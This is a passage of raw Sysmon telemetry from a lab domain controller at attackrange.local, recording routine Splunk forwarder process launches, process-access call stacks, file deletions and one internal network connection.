16:55:03.014{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243517Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:03.014{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243516Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:03.014{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-6DE7-603E-E7AA-00000000AD01}11492C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002243515Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:03.014{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6DE7-603E-E7AA-00000000AD01}11492C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002243514Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:03.015{05ADC7E1-6DE7-603E-E7AA-00000000AD01}11492C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002243553Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:04.951{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6DE8-603E-EAAA-00000000AD01}8288C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243552Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:04.951{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243551Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:04.951{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243550Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:04.951{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243549Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:04.951{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243548Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:04.951{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-6DE8-603E-EAAA-00000000AD01}8288C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002243547Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:04.951{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6DE8-603E-EAAA-00000000AD01}8288C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002243546Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:04.952{05ADC7E1-6DE8-603E-EAAA-00000000AD01}8288C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002243545Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:04.811{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A5BF1F1A99B77E87F7220260B5161B2B,SHA256=D5624E423A8E6CB226BD212E2299FA8CE78BFBF28956609B3154E9AE0E712784,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002243544Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:54.270{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60164-false10.0.1.12-8000- 23542300x80000000000000002243543Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:04.342{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED4D59A72D3875C54C759E778A689063,SHA256=06926C89BE47D7A53B56F243007F599D035B1C783DDC7D196FE0628968DAC239,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243542Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:04.275{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6DE8-603E-E9AA-00000000AD01}7640C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243541Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:04.274{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243540Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:04.274{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243539Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:04.274{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243538Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:04.274{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243537Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:04.274{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-6DE8-603E-E9AA-00000000AD01}7640C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002243536Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:04.273{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6DE8-603E-E9AA-00000000AD01}7640C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002243535Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:04.265{05ADC7E1-6DE8-603E-E9AA-00000000AD01}7640C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002243555Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:05.375{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A3EB404E0F85CF430B575588BAA8234,SHA256=FF958C9AE93AE15B970D6AE352D87D75C7D48B95FD06603B74FCE35E9B81D426,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243554Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:05.154{05ADC7E1-6DE8-603E-EAAA-00000000AD01}82887064C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002243557Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:06.404{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=959316409006E87BFB594586331A2FC1,SHA256=C1F44DBC482E5596C2B8098AA8014BC99AD40D45478FFB6DBD975D403372E71C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243556Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:05.998{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FBC10DF835598017520CCDD64DF390F3,SHA256=CBAFE39EE4703BA272A85FAF5C80763BE9C3B63E45100D4A748171C7AF631C18,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243562Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:07.795{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243561Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:55:07.795{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243560Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 